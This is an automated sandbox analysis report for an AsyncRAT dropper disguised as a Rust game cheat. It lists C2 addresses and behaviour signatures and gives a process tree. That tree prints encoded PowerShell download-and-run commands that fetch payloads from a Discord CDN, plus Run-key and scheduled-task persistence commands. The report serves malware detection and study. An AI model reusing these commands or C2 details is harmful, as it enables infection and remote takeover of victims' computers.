Resubmissions

10-03-2023 22:01

230310-1xerdshc7x 7

14-02-2023 16:10

230214-tmg1faee72 7

31-01-2023 07:47

230131-jmw49afe54 10

26-12-2022 21:03

221226-zv36jaha4x 10

24-12-2022 19:27

221224-x6gessdf7z 10

13-12-2022 03:51

221213-eenexsgc4v 10

12-12-2022 11:33

221212-npbnjsbc28 10

06-12-2022 06:29

221206-g8658sca54 8

05-12-2022 06:17

221205-g19ldsgh7x 10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2022 19:27

General

  • Target

    RustExternal_nls.exe

  • Size

    658KB

  • MD5

    1ab8dbca5e2bba39723f00907d266de7

  • SHA1

    729cb808637568f20ac886b3fac5f3cf5ff01dee

  • SHA256

    c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

  • SHA512

    d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081

  • SSDEEP

    12288:3oSO5i2eVUIvybKcEz4MM7S9HdKINesX7j6p9PI8GS0oN2:3ouTVUIvtH4H7aLeO23gRoY

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes
  • delay

    3

  • install

    false

  • install_file

    System Guard Runtime

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealtheurvice.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

UWUISCOMIC

C2

20.100.196.69:9281

Mutex

UWUISCOMIC

Attributes
  • delay

    3

  • install

    false

  • install_file

    DerenderScuriry

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DerenderScuriry

C2

20.100.196.69:9281

Mutex

DerenderScuriry

Attributes
  • delay

    3

  • install

    false

  • install_file

    DerenderScuriry

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 4 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe
    "C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1544
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3928
      • C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
        "C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3232
        • C:\Windows\system32\cmd.exe
          "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2204
          • C:\Users\Admin\AppData\Local\Temp\0.exe
            C:\Users\Admin\AppData\Local\Temp\0.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3128
            • C:\Windows\system32\cmd.exe
              "cmd" /C C:\Users\Admin\AppData\Local\Temp\1mpikpUXSB.exe
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1576
              • C:\Users\Admin\AppData\Local\Temp\1mpikpUXSB.exe
                C:\Users\Admin\AppData\Local\Temp\1mpikpUXSB.exe
                7⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:400
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAbgBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUANQA2ADAANAA2ADUANAA0ADQANgAyADIAMwAzADcAMAAvADEAMAA1ADUANgAwADQANwA3ADUAMAAwADMAMAA5ADkAMQA4ADYALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAHAAZgB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB3AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegB2AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQApADwAIwBuAGUAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGsAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBuAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAYQBjAHAAIwA+AA=="
                  8⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2372
                  • C:\Users\Admin\AppData\Roaming\1.exe
                    "C:\Users\Admin\AppData\Roaming\1.exe"
                    9⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5096
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      10⤵
                        PID:5840
              • C:\Windows\system32\cmd.exe
                "cmd" /C C:\Users\Admin\AppData\Local\Temp\0sONKvKAqc.exe
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3632
                • C:\Users\Admin\AppData\Local\Temp\0sONKvKAqc.exe
                  C:\Users\Admin\AppData\Local\Temp\0sONKvKAqc.exe
                  7⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:1900
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA3ADkAMgAzADMAOAAxADYANQA4ADEAMAAvAEMAUgAuAGUAeABlACcALAAgADwAIwBnAHgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAeQBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAbQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAZAB4AHMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABkAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAGMAaQBnACMAPgA="
                    8⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:528
                    • C:\Users\Admin\AppData\Roaming\2.exe
                      "C:\Users\Admin\AppData\Roaming\2.exe"
                      9⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2736
              • C:\Windows\system32\cmd.exe
                "cmd" /C C:\Users\Admin\AppData\Local\Temp\V6CYedp7Jf.exe
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4312
                • C:\Users\Admin\AppData\Local\Temp\V6CYedp7Jf.exe
                  C:\Users\Admin\AppData\Local\Temp\V6CYedp7Jf.exe
                  7⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:4652
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAawBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA4ADcAMgA2ADgAMAAwADUANAA4ADQANQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHQAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAHAAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApACkAPAAjAGwAegBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAZwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwB0AG4AeAAjAD4A"
                    8⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4996
                    • C:\Users\Admin\AppData\Roaming\3.exe
                      "C:\Users\Admin\AppData\Roaming\3.exe"
                      9⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5752
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        10⤵
                          PID:5184
                • C:\Windows\system32\cmd.exe
                  "cmd" /C C:\Users\Admin\AppData\Local\Temp\0frqJS32pW.exe
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2600
                  • C:\Users\Admin\AppData\Local\Temp\0frqJS32pW.exe
                    C:\Users\Admin\AppData\Local\Temp\0frqJS32pW.exe
                    7⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:112
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAcQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA4ADgAOQA3ADYAMwA0ADUAMAA4ADkAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGwAdwBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcwBmAGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBkAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANAAuAGUAeABlACcAKQApADwAIwByAGIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGIAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBxAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANAAuAGUAeABlACcAKQA8ACMAegBpAGYAIwA+AA=="
                      8⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3324
                      • C:\Users\Admin\AppData\Roaming\4.exe
                        "C:\Users\Admin\AppData\Roaming\4.exe"
                        9⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:5928
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
                          10⤵
                          • Adds Run key to start application
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5984
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                          10⤵
                            PID:5996
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                              11⤵
                              • Creates scheduled task(s)
                              PID:6140
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            #cmd
                            10⤵
                              PID:6048
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\ueiAOQu5Pw.exe
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2256
                      • C:\Users\Admin\AppData\Local\Temp\ueiAOQu5Pw.exe
                        C:\Users\Admin\AppData\Local\Temp\ueiAOQu5Pw.exe
                        7⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:3104
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA5ADIANwAzADAANgA2ADcAOAAzADAAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAG0AaABwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABkAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQBoAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQApADwAIwBoAHIAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAHUAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQA8ACMAaQB0AHAAIwA+AA=="
                          8⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1960
                          • C:\Users\Admin\AppData\Roaming\5.exe
                            "C:\Users\Admin\AppData\Roaming\5.exe"
                            9⤵
                            • Executes dropped EXE
                            PID:5260
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 804
                              10⤵
                              • Program crash
                              PID:2720
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\nuSc72yKVp.exe
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2464
                      • C:\Users\Admin\AppData\Local\Temp\nuSc72yKVp.exe
                        C:\Users\Admin\AppData\Local\Temp\nuSc72yKVp.exe
                        7⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:3840
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA5ADYAMQA5ADYAOAAzADkANAAzADEAMQAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGEAYQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegBzAGUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgBqAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgAuAGUAeABlACcAKQApADwAIwB3AHQAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHgAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABjAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgAuAGUAeABlACcAKQA8ACMAcgBrAHQAIwA+AA=="
                          8⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2624
                          • C:\Users\Admin\AppData\Roaming\6.exe
                            "C:\Users\Admin\AppData\Roaming\6.exe"
                            9⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            PID:2088
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\wTKv2uf4BU.exe
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:396
                      • C:\Users\Admin\AppData\Local\Temp\wTKv2uf4BU.exe
                        C:\Users\Admin\AppData\Local\Temp\wTKv2uf4BU.exe
                        7⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        PID:4264
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANQAwADMAMAAzADEAMAAzADgANwA3ADIAMgAvAGwAaQBlAG8AZABvAGMAZQBtAHAALgBlAHgAZQAnACwAIAA8ACMAeABhAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AHgAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAGsAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA3AC4AZQB4AGUAJwApACkAPAAjAHoAdAB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcwB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAGoAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA3AC4AZQB4AGUAJwApADwAIwBlAGoAZAAjAD4A"
                          8⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:868
                          • C:\Users\Admin\AppData\Roaming\7.exe
                            "C:\Users\Admin\AppData\Roaming\7.exe"
                            9⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5596
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              10⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5868
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\xlDQsyUn1K.exe
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1372
                      • C:\Users\Admin\AppData\Local\Temp\xlDQsyUn1K.exe
                        C:\Users\Admin\AppData\Local\Temp\xlDQsyUn1K.exe
                        7⤵
                          PID:3708
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADUANgAwADQANgA1ADQANAA0ADYAMgAyADMAMwA3ADAALwAxADAANQA1ADYAMAA1ADAANAA1ADAAMgA4ADIAMQAyADcAOAA3AC8AVwBQAHIAbwB0AGUAYwBNAHMAYwB2AC4AZQB4AGUAJwAsACAAPAAjAHQAYQB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBxAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBuAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQApADwAIwByAGwAdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGUAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcAByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQA8ACMAawBmAGgAIwA+AA=="
                            8⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4496
                            • C:\Users\Admin\AppData\Roaming\8.exe
                              "C:\Users\Admin\AppData\Roaming\8.exe"
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:5552
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WProtecMscv';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WProtecMscv' -Value '"C:\Users\Admin\AppData\Roaming\WProtecMscv\WProtecMscv.exe"' -PropertyType 'String'
                                10⤵
                                • Adds Run key to start application
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:112
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                #cmd
                                10⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5152
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd" /C schtasks /create /tn \WProtecMscv /tr "C:\Users\Admin\AppData\Roaming\WProtecMscv\WProtecMscv.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                10⤵
